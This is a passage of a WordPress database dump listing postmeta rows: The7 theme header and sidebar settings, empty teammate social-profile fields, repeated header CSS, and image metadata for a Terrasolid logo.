(33439,4633,'_dt_teammate_options_website',''),
(33440,4633,'_dt_teammate_options_mail',''),
(33441,4633,'_dt_teammate_options_facebook',''),
(33442,4633,'_dt_teammate_options_twitter',''),
(33443,4633,'_dt_teammate_options_dribbble',''),
(33444,4633,'_dt_teammate_options_you-tube',''),
(33445,4633,'_dt_teammate_options_rss',''),
(33446,4633,'_dt_teammate_options_delicious',''),
(33447,4633,'_dt_teammate_options_flickr',''),
(33448,4633,'_dt_teammate_options_lastfm',''),
(33449,4633,'_dt_teammate_options_linkedin',''),
(33450,4633,'_dt_teammate_options_vimeo',''),
(33451,4633,'_dt_teammate_options_tumbler',''),
(33452,4633,'_dt_teammate_options_pinterest',''),
(33453,4633,'_dt_teammate_options_devian',''),
(33454,4633,'_dt_teammate_options_skype',''),
(33455,4633,'_dt_teammate_options_github',''),
(33456,4633,'_dt_teammate_options_instagram',''),
(33457,4633,'_dt_teammate_options_stumbleupon',''),
(33458,4633,'_dt_teammate_options_behance',''),
(33459,4633,'_dt_teammate_options_px-500',''),
(33460,4633,'_dt_teammate_options_tripedvisor',''),
(33461,4633,'_dt_teammate_options_vk',''),
(33462,4633,'_dt_teammate_options_foursquare',''),
(33463,4633,'_dt_teammate_options_xing',''),
(33464,4633,'_dt_teammate_options_weibo',''),
(33465,4633,'_dt_teammate_options_odnoklassniki',''),
(33466,4633,'_dt_teammate_options_research-gate',''),
(33467,4633,'_dt_teammate_options_yelp',''),
(33468,4633,'_dt_teammate_options_blogger',''),
(33469,4633,'_dt_teammate_options_soundcloud',''),
(33470,4633,'_dt_teammate_options_viber',''),
(33471,4633,'_dt_teammate_options_whatsapp',''),
(33472,4633,'_dt_teammate_options_reddit',''),
(33473,4633,'_dt_teammate_options_snapchat',''),
(33474,4633,'_dt_teammate_options_telegram',''),
(33475,4633,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33477,4655,'_wp_attached_file','2023/06/Terrasolid_logo_wide2_rgb_300dpi.png'),
(33478,4655,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2598;s:6:\"height\";i:974;s:4:\"file\";s:44:\"2023/06/Terrasolid_logo_wide2_rgb_300dpi.png\";s:8:\"filesize\";i:122727;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"Terrasolid_logo_wide2_rgb_300dpi-300x112.png\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18474;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"Terrasolid_logo_wide2_rgb_300dpi-1024x384.png\";s:5:\"width\";i:1024;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125430;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"Terrasolid_logo_wide2_rgb_300dpi-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12332;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"Terrasolid_logo_wide2_rgb_300dpi-768x288.png\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:69039;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:45:\"Terrasolid_logo_wide2_rgb_300dpi-1536x576.png\";s:5:\"width\";i:1536;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:259886;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:45:\"Terrasolid_logo_wide2_rgb_300dpi-2048x768.png\";s:5:\"width\";i:2048;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:483239;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:44:\"Terrasolid_logo_wide2_rgb_300dpi-500x187.png\";s:5:\"width\";i:500;s:6:\"height\";i:187;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47133;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:44:\"Terrasolid_logo_wide2_rgb_300dpi-800x300.png\";s:5:\"width\";i:800;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116684;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:45:\"Terrasolid_logo_wide2_rgb_300dpi-1280x480.png\";s:5:\"width\";i:1280;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:273939;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:45:\"Terrasolid_logo_wide2_rgb_300dpi-1920x720.png\";s:5:\"width\";i:1920;s:6:\"height\";i:720;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:540186;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(33479,4659,'_edit_lock','1686350350:1'),
(33480,4659,'_thumbnail_id','2271'),
(33481,4659,'_edit_last','1'),
(33482,4659,'_dt_sidebar_position','disabled'),
(33483,4659,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33484,4659,'_dt_sidebar_hide_on_mobile','0'),
(33485,4659,'_dt_footer_show','1'),
(33486,4659,'_dt_footer_widgetarea_id','sidebar_2'),
(33487,4659,'_dt_footer_hide_on_mobile','0'),
(33488,4659,'_dt_header_title','fancy'),
(33489,4659,'_dt_header_background','normal'),
(33490,4659,'_dt_header_background_below_slideshow','disabled'),
(33491,4659,'_dt_header_transparent_bg_color_scheme','light'),
(33492,4659,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33493,4659,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33494,4659,'_dt_header_transparent_bg_color','#000000'),
(33495,4659,'_dt_header_transparent_bg_opacity','50'),
(33496,4659,'_dt_header_disabled_background','normal'),
(33497,4659,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33498,4659,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33499,4659,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33500,4659,'_dt_header_disabled_transparent_bg_color','#000000'),
(33501,4659,'_dt_header_disabled_transparent_bg_opacity','50'),
(33502,4659,'_dt_page_overrides_top_margin',''),
(33503,4659,'_dt_page_overrides_right_margin',''),
(33504,4659,'_dt_page_overrides_bottom_margin',''),
(33505,4659,'_dt_page_overrides_left_margin',''),
(33506,4659,'_dt_mobile_page_padding_top',''),
(33507,4659,'_dt_mobile_page_padding_right',''),
(33508,4659,'_dt_mobile_page_padding_bottom',''),
(33509,4659,'_dt_mobile_page_padding_left',''),
(33510,4659,'_dt_fancy_header_layout_heading',''),
(33511,4659,'_dt_fancy_header_title_aligment','center'),
(33512,4659,'_dt_fancy_header_height','300'),
(33513,4659,'_dt_fancy_header_padding-top','0px'),
(33514,4659,'_dt_fancy_header_padding-bottom','0px'),
(33515,4659,'_dt_fancy_header_breadcrumbs_heading',''),
(33516,4659,'_dt_fancy_header_breadcrumbs','disabled'),
(33517,4659,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33518,4659,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33519,4659,'_dt_fancy_header_title_heading',''),
(33520,4659,'_dt_fancy_header_title_mode','generic'),
(33521,4659,'_dt_fancy_header_title',''),
(33522,4659,'_dt_fancy_header_title_font_size','30'),
(33523,4659,'_dt_fancy_header_title_line_height','36'),
(33524,4659,'_dt_fancy_header_text_transform','none'),
(33525,4659,'_dt_fancy_header_title_color_mode','color'),
(33526,4659,'_dt_fancy_header_title_color','#ffffff'),
(33527,4659,'_dt_fancy_header_subtitle_heading',''),
(33528,4659,'_dt_fancy_header_subtitle',''),
(33529,4659,'_dt_fancy_header_subtitle_font_size','18'),
(33530,4659,'_dt_fancy_header_subtitle_line_height','26'),
(33531,4659,'_dt_fancy_header_subtitle_text_transform','none'),
(33532,4659,'_dt_fancy_header_subtitle_color_mode','color'),
(33533,4659,'_dt_fancy_header_subtitle_color','#ffffff'),
(33534,4659,'_dt_fancy_header_bg_heading',''),
(33535,4659,'_dt_fancy_header_bg_color','#222222'),
(33536,4659,'_dt_fancy_header_bg_image_origin','custom'),
(33537,4659,'_dt_fancy_header_bg_image','a:0:{}'),
(33538,4659,'_dt_fancy_header_bg_repeat','no-repeat'),
(33539,4659,'_dt_fancy_header_bg_position_x','center'),
(33540,4659,'_dt_fancy_header_bg_position_y','center'),
(33541,4659,'_dt_fancy_header_bg_fullscreen','1'),
(33542,4659,'_dt_fancy_header_bg_overlay','0'),
(33543,4659,'_dt_fancy_header_overlay_color','#000'),
(33544,4659,'_dt_fancy_header_bg_overlay_opacity','50'),
(33545,4659,'_dt_fancy_header_scroll_effect','default'),
(33546,4659,'_dt_fancy_header_bg_parallax','0.5'),
(33547,4659,'_dt_fancy_header_responsiveness_heading',''),
(33548,4659,'_dt_fancy_header_responsiveness','disabled'),
(33549,4659,'_dt_fancy_header_responsiveness_switch','778px'),
(33550,4659,'_dt_fancy_header_responsive_height','70'),
(33551,4659,'_dt_fancy_header_responsive_font_size','30'),
(33552,4659,'_dt_fancy_header_responsive_title_line_height','38'),
(33553,4659,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33554,4659,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33555,4659,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33556,4659,'_dt_teammate_options_go_to_single','1'),
(33557,4659,'_dt_teammate_options_position',''),
(33558,4659,'_dt_teammate_options_website',''),
(33559,4659,'_dt_teammate_options_mail',''),
(33560,4659,'_dt_teammate_options_facebook',''),
(33561,4659,'_dt_teammate_options_twitter',''),
(33562,4659,'_dt_teammate_options_dribbble',''),
(33563,4659,'_dt_teammate_options_you-tube',''),
(33564,4659,'_dt_teammate_options_rss',''),
(33565,4659,'_dt_teammate_options_delicious',''),
(33566,4659,'_dt_teammate_options_flickr',''),
(33567,4659,'_dt_teammate_options_lastfm',''),
(33568,4659,'_dt_teammate_options_linkedin',''),
(33569,4659,'_dt_teammate_options_vimeo',''),
(33570,4659,'_dt_teammate_options_tumbler',''),
(33571,4659,'_dt_teammate_options_pinterest',''),
(33572,4659,'_dt_teammate_options_devian',''),
(33573,4659,'_dt_teammate_options_skype',''),
(33574,4659,'_dt_teammate_options_github',''),
(33575,4659,'_dt_teammate_options_instagram',''),
(33576,4659,'_dt_teammate_options_stumbleupon',''),
(33577,4659,'_dt_teammate_options_behance',''),
(33578,4659,'_dt_teammate_options_px-500',''),
(33579,4659,'_dt_teammate_options_tripedvisor',''),
(33580,4659,'_dt_teammate_options_vk',''),
(33581,4659,'_dt_teammate_options_foursquare',''),
(33582,4659,'_dt_teammate_options_xing',''),
(33583,4659,'_dt_teammate_options_weibo',''),
(33584,4659,'_dt_teammate_options_odnoklassniki',''),
(33585,4659,'_dt_teammate_options_research-gate',''),
(33586,4659,'_dt_teammate_options_yelp',''),
(33587,4659,'_dt_teammate_options_blogger',''),
(33588,4659,'_dt_teammate_options_soundcloud',''),
(33589,4659,'_dt_teammate_options_viber',''),
(33590,4659,'_dt_teammate_options_whatsapp',''),
(33591,4659,'_dt_teammate_options_reddit',''),
(33592,4659,'_dt_teammate_options_snapchat',''),
(33593,4659,'_dt_teammate_options_telegram',''),
(33594,4659,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33595,4660,'_edit_lock','1687947366:4'),
(33596,4660,'_thumbnail_id','4614'),
(33597,4660,'_edit_last','1'),
(33598,4660,'_dt_sidebar_position','disabled'),
(33599,4660,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33600,4660,'_dt_sidebar_hide_on_mobile','0'),
(33601,4660,'_dt_footer_show','1'),
(33602,4660,'_dt_footer_widgetarea_id','sidebar_2'),
(33603,4660,'_dt_footer_hide_on_mobile','0'),
(33604,4660,'_dt_header_title','fancy'),
(33605,4660,'_dt_header_background','normal'),
(33606,4660,'_dt_header_background_below_slideshow','disabled'),
(33607,4660,'_dt_header_transparent_bg_color_scheme','light'),
(33608,4660,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33609,4660,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33610,4660,'_dt_header_transparent_bg_color','#000000'),
(33611,4660,'_dt_header_transparent_bg_opacity','50'),
(33612,4660,'_dt_header_disabled_background','normal'),
(33613,4660,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33614,4660,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33615,4660,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33616,4660,'_dt_header_disabled_transparent_bg_color','#000000'),
(33617,4660,'_dt_header_disabled_transparent_bg_opacity','50'),
(33618,4660,'_dt_page_overrides_top_margin',''),
(33619,4660,'_dt_page_overrides_right_margin',''),
(33620,4660,'_dt_page_overrides_bottom_margin',''),
(33621,4660,'_dt_page_overrides_left_margin',''),
(33622,4660,'_dt_mobile_page_padding_top',''),
(33623,4660,'_dt_mobile_page_padding_right',''),
(33624,4660,'_dt_mobile_page_padding_bottom',''),
(33625,4660,'_dt_mobile_page_padding_left',''),
(33626,4660,'_dt_fancy_header_layout_heading',''),
(33627,4660,'_dt_fancy_header_title_aligment','center'),
(33628,4660,'_dt_fancy_header_height','300'),
(33629,4660,'_dt_fancy_header_padding-top','0px'),
(33630,4660,'_dt_fancy_header_padding-bottom','0px'),
(33631,4660,'_dt_fancy_header_breadcrumbs_heading',''),
(33632,4660,'_dt_fancy_header_breadcrumbs','disabled'),
(33633,4660,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33634,4660,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33635,4660,'_dt_fancy_header_title_heading',''),
(33636,4660,'_dt_fancy_header_title_mode','generic'),
(33637,4660,'_dt_fancy_header_title',''),
(33638,4660,'_dt_fancy_header_title_font_size','30'),
(33639,4660,'_dt_fancy_header_title_line_height','36'),
(33640,4660,'_dt_fancy_header_text_transform','none'),
(33641,4660,'_dt_fancy_header_title_color_mode','color'),
(33642,4660,'_dt_fancy_header_title_color','#ffffff'),
(33643,4660,'_dt_fancy_header_subtitle_heading',''),
(33644,4660,'_dt_fancy_header_subtitle',''),
(33645,4660,'_dt_fancy_header_subtitle_font_size','18'),
(33646,4660,'_dt_fancy_header_subtitle_line_height','26'),
(33647,4660,'_dt_fancy_header_subtitle_text_transform','none'),
(33648,4660,'_dt_fancy_header_subtitle_color_mode','color'),
(33649,4660,'_dt_fancy_header_subtitle_color','#ffffff'),
(33650,4660,'_dt_fancy_header_bg_heading',''),
(33651,4660,'_dt_fancy_header_bg_color','#222222'),
(33652,4660,'_dt_fancy_header_bg_image_origin','custom'),
(33653,4660,'_dt_fancy_header_bg_image','a:0:{}'),
(33654,4660,'_dt_fancy_header_bg_repeat','no-repeat'),
(33655,4660,'_dt_fancy_header_bg_position_x','center'),
(33656,4660,'_dt_fancy_header_bg_position_y','center'),
(33657,4660,'_dt_fancy_header_bg_fullscreen','1'),
(33658,4660,'_dt_fancy_header_bg_overlay','0'),
(33659,4660,'_dt_fancy_header_overlay_color','#000'),
(33660,4660,'_dt_fancy_header_bg_overlay_opacity','50'),
(33661,4660,'_dt_fancy_header_scroll_effect','default'),
(33662,4660,'_dt_fancy_header_bg_parallax','0.5'),
(33663,4660,'_dt_fancy_header_responsiveness_heading',''),
(33664,4660,'_dt_fancy_header_responsiveness','disabled'),
(33665,4660,'_dt_fancy_header_responsiveness_switch','778px'),
(33666,4660,'_dt_fancy_header_responsive_height','70'),
(33667,4660,'_dt_fancy_header_responsive_font_size','30'),
(33668,4660,'_dt_fancy_header_responsive_title_line_height','38'),
(33669,4660,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33670,4660,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33671,4660,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33672,4660,'_dt_teammate_options_go_to_single','1'),
(33673,4660,'_dt_teammate_options_position',''),
(33674,4660,'_dt_teammate_options_website',''),
(33675,4660,'_dt_teammate_options_mail',''),
(33676,4660,'_dt_teammate_options_facebook',''),
(33677,4660,'_dt_teammate_options_twitter',''),
(33678,4660,'_dt_teammate_options_dribbble',''),
(33679,4660,'_dt_teammate_options_you-tube',''),
(33680,4660,'_dt_teammate_options_rss',''),
(33681,4660,'_dt_teammate_options_delicious',''),
(33682,4660,'_dt_teammate_options_flickr',''),
(33683,4660,'_dt_teammate_options_lastfm',''),
(33684,4660,'_dt_teammate_options_linkedin',''),
(33685,4660,'_dt_teammate_options_vimeo',''),
(33686,4660,'_dt_teammate_options_tumbler',''),
(33687,4660,'_dt_teammate_options_pinterest',''),
(33688,4660,'_dt_teammate_options_devian',''),
(33689,4660,'_dt_teammate_options_skype',''),
(33690,4660,'_dt_teammate_options_github',''),
(33691,4660,'_dt_teammate_options_instagram',''),
(33692,4660,'_dt_teammate_options_stumbleupon',''),
(33693,4660,'_dt_teammate_options_behance',''),
(33694,4660,'_dt_teammate_options_px-500',''),
(33695,4660,'_dt_teammate_options_tripedvisor',''),
(33696,4660,'_dt_teammate_options_vk',''),
(33697,4660,'_dt_teammate_options_foursquare',''),
(33698,4660,'_dt_teammate_options_xing',''),
(33699,4660,'_dt_teammate_options_weibo',''),
(33700,4660,'_dt_teammate_options_odnoklassniki',''),
(33701,4660,'_dt_teammate_options_research-gate',''),
(33702,4660,'_dt_teammate_options_yelp',''),
(33703,4660,'_dt_teammate_options_blogger',''),
(33704,4660,'_dt_teammate_options_soundcloud',''),
(33705,4660,'_dt_teammate_options_viber',''),
(33706,4660,'_dt_teammate_options_whatsapp',''),
(33707,4660,'_dt_teammate_options_reddit',''),
(33708,4660,'_dt_teammate_options_snapchat',''),
(33709,4660,'_dt_teammate_options_telegram',''),
(33710,4660,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33711,4661,'_edit_lock','1687095524:1'),
(33712,4661,'_thumbnail_id','2272'),
(33713,4661,'_edit_last','1'),
(33714,4661,'_dt_sidebar_position','disabled'),
(33715,4661,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33716,4661,'_dt_sidebar_hide_on_mobile','0'),
(33717,4661,'_dt_footer_show','1'),
(33718,4661,'_dt_footer_widgetarea_id','sidebar_2'),
(33719,4661,'_dt_footer_hide_on_mobile','0'),
(33720,4661,'_dt_header_title','fancy'),
(33721,4661,'_dt_header_background','normal'),
(33722,4661,'_dt_header_background_below_slideshow','disabled'),
(33723,4661,'_dt_header_transparent_bg_color_scheme','light'),
(33724,4661,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33725,4661,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33726,4661,'_dt_header_transparent_bg_color','#000000'),
(33727,4661,'_dt_header_transparent_bg_opacity','50'),
(33728,4661,'_dt_header_disabled_background','normal'),
(33729,4661,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33730,4661,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33731,4661,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33732,4661,'_dt_header_disabled_transparent_bg_color','#000000'),
(33733,4661,'_dt_header_disabled_transparent_bg_opacity','50'),
(33734,4661,'_dt_page_overrides_top_margin',''),
(33735,4661,'_dt_page_overrides_right_margin',''),
(33736,4661,'_dt_page_overrides_bottom_margin',''),
(33737,4661,'_dt_page_overrides_left_margin',''),
(33738,4661,'_dt_mobile_page_padding_top',''),
(33739,4661,'_dt_mobile_page_padding_right',''),
(33740,4661,'_dt_mobile_page_padding_bottom',''),
(33741,4661,'_dt_mobile_page_padding_left',''),
(33742,4661,'_dt_fancy_header_layout_heading',''),
(33743,4661,'_dt_fancy_header_title_aligment','center'),
(33744,4661,'_dt_fancy_header_height','300'),
(33745,4661,'_dt_fancy_header_padding-top','0px'),
(33746,4661,'_dt_fancy_header_padding-bottom','0px'),
(33747,4661,'_dt_fancy_header_breadcrumbs_heading',''),
(33748,4661,'_dt_fancy_header_breadcrumbs','disabled'),
(33749,4661,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33750,4661,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33751,4661,'_dt_fancy_header_title_heading',''),
(33752,4661,'_dt_fancy_header_title_mode','generic'),
(33753,4661,'_dt_fancy_header_title',''),
(33754,4661,'_dt_fancy_header_title_font_size','30'),
(33755,4661,'_dt_fancy_header_title_line_height','36'),
(33756,4661,'_dt_fancy_header_text_transform','none'),
(33757,4661,'_dt_fancy_header_title_color_mode','color'),
(33758,4661,'_dt_fancy_header_title_color','#ffffff'),
(33759,4661,'_dt_fancy_header_subtitle_heading',''),
(33760,4661,'_dt_fancy_header_subtitle',''),
(33761,4661,'_dt_fancy_header_subtitle_font_size','18'),
(33762,4661,'_dt_fancy_header_subtitle_line_height','26'),
(33763,4661,'_dt_fancy_header_subtitle_text_transform','none'),
(33764,4661,'_dt_fancy_header_subtitle_color_mode','color'),
(33765,4661,'_dt_fancy_header_subtitle_color','#ffffff'),
(33766,4661,'_dt_fancy_header_bg_heading',''),
(33767,4661,'_dt_fancy_header_bg_color','#222222'),
(33768,4661,'_dt_fancy_header_bg_image_origin','custom'),
(33769,4661,'_dt_fancy_header_bg_image','a:0:{}'),
(33770,4661,'_dt_fancy_header_bg_repeat','no-repeat'),
(33771,4661,'_dt_fancy_header_bg_position_x','center'),
(33772,4661,'_dt_fancy_header_bg_position_y','center'),
(33773,4661,'_dt_fancy_header_bg_fullscreen','1'),
(33774,4661,'_dt_fancy_header_bg_overlay','0'),
(33775,4661,'_dt_fancy_header_overlay_color','#000'),
(33776,4661,'_dt_fancy_header_bg_overlay_opacity','50'),
(33777,4661,'_dt_fancy_header_scroll_effect','default'),
(33778,4661,'_dt_fancy_header_bg_parallax','0.5'),
(33779,4661,'_dt_fancy_header_responsiveness_heading',''),
(33780,4661,'_dt_fancy_header_responsiveness','disabled'),
(33781,4661,'_dt_fancy_header_responsiveness_switch','778px'),
(33782,4661,'_dt_fancy_header_responsive_height','70'),
(33783,4661,'_dt_fancy_header_responsive_font_size','30'),
(33784,4661,'_dt_fancy_header_responsive_title_line_height','38'),
(33785,4661,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33786,4661,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33787,4661,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33788,4661,'_dt_teammate_options_go_to_single','1'),
(33789,4661,'_dt_teammate_options_position',''),
(33790,4661,'_dt_teammate_options_website',''),
(33791,4661,'_dt_teammate_options_mail',''),
(33792,4661,'_dt_teammate_options_facebook',''),
(33793,4661,'_dt_teammate_options_twitter',''),
(33794,4661,'_dt_teammate_options_dribbble',''),
(33795,4661,'_dt_teammate_options_you-tube',''),
(33796,4661,'_dt_teammate_options_rss',''),
(33797,4661,'_dt_teammate_options_delicious',''),
(33798,4661,'_dt_teammate_options_flickr',''),
(33799,4661,'_dt_teammate_options_lastfm',''),
(33800,4661,'_dt_teammate_options_linkedin',''),
(33801,4661,'_dt_teammate_options_vimeo',''),
(33802,4661,'_dt_teammate_options_tumbler',''),
(33803,4661,'_dt_teammate_options_pinterest',''),
(33804,4661,'_dt_teammate_options_devian',''),
(33805,4661,'_dt_teammate_options_skype',''),
(33806,4661,'_dt_teammate_options_github',''),
(33807,4661,'_dt_teammate_options_instagram',''),
(33808,4661,'_dt_teammate_options_stumbleupon',''),
(33809,4661,'_dt_teammate_options_behance',''),
(33810,4661,'_dt_teammate_options_px-500',''),
(33811,4661,'_dt_teammate_options_tripedvisor',''),
